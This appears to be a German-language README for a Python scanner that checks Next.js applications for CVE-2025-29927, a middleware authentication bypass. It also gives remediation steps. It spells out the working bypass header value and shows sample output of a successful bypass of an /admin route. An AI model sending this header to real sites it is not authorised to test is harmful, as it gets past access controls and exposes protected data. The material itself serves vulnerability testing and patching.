
🔐 Python-basierter intelligenter Scanner für CVE-2025-29927 — Next.js-Middleware-Authentifizierungsumgehungs-Schwachstelle. Erkennt Meta-Refresh, keyword-basierte Weiterleitungen und mehr.
Dieser Python-basierte intelligente Scanner hilft, die CVE-2025-29927-Sicherheitslücke in Next.js-Anwendungen zu erkennen – einen kritischen Middleware-Bypass, der Angreifern ermöglicht, die Authentifizierung mithilfe eines manipulierten HTTP-Headers zu umgehen.
🧠 Das Tool erkennt nicht nur HTTP-Weiterleitungen, sondern auch clientseitige Weiterleitungsmechanismen wie
<meta http-equiv="refresh">, schlüsselwortbasierte Login-Weiterleitungen und stille Authentifizierungsumgehungen.
x-middleware-subrequest Bypass-Header<meta refresh>-basierte Weiterleitungenlogin, sign in, authentication$ python3 CVE-2025-29927.py
🌐 Enter the target site URL (e.g. http://localhost:3000): http://vulnerable.local
📁 Enter the protected path (e.g. /dashboard): /admin
→ Testing with header: middleware:middleware:middleware:middleware:middleware
↳ HTTP Status: 200
↳ Redirect detected: No
✅ VULNERABLE! Bypass successful with header:
x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware
git clone https://github.com/sagsooz/CVE-2025-29927.git
cd CVE-2025-29927
pip install -r requirements.txt
python3 CVE-2025-29927.py
.
├── CVE-2025-29927.py # Main interactive scanner
├── requirements.txt # Python dependencies
└── README.md # This file
requests
beautifulsoup4
colorama
Wenn Ihre App betroffen ist, gehen Sie wie folgt vor:
v15.2.3 oder neuer (bzw. 14.2.25+ / 13.5.7+)proxy_set_header x-middleware-subrequest "";
CVE-2025-29927 ermöglicht Angreifern, Next.js-Middleware-Prüfungen zu umgehen, indem sie den x-middleware-subrequest-Header mit manipulierten Werten wie folgt manipulieren:
x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware
In anfälligen Versionen wird dadurch die Middleware-Ausführung vollständig deaktiviert – was direkten Zugriff auf geschützte Routen wie /dashboard, /admin usw. ermöglicht.
Gepflegt von: @mrzblackhat
Kontaktieren Sie mich gerne auf Telegram für Vorschläge, Verbesserungen oder Beiträge.
next.js CVE-2025-29927 bugbounty middleware bypass authentication web security python security scanner ethical hacking
Dieses Tool wird ausschließlich zu Bildungs- und Forschungszwecken bereitgestellt. Verwenden Sie es verantwortungsbewusst.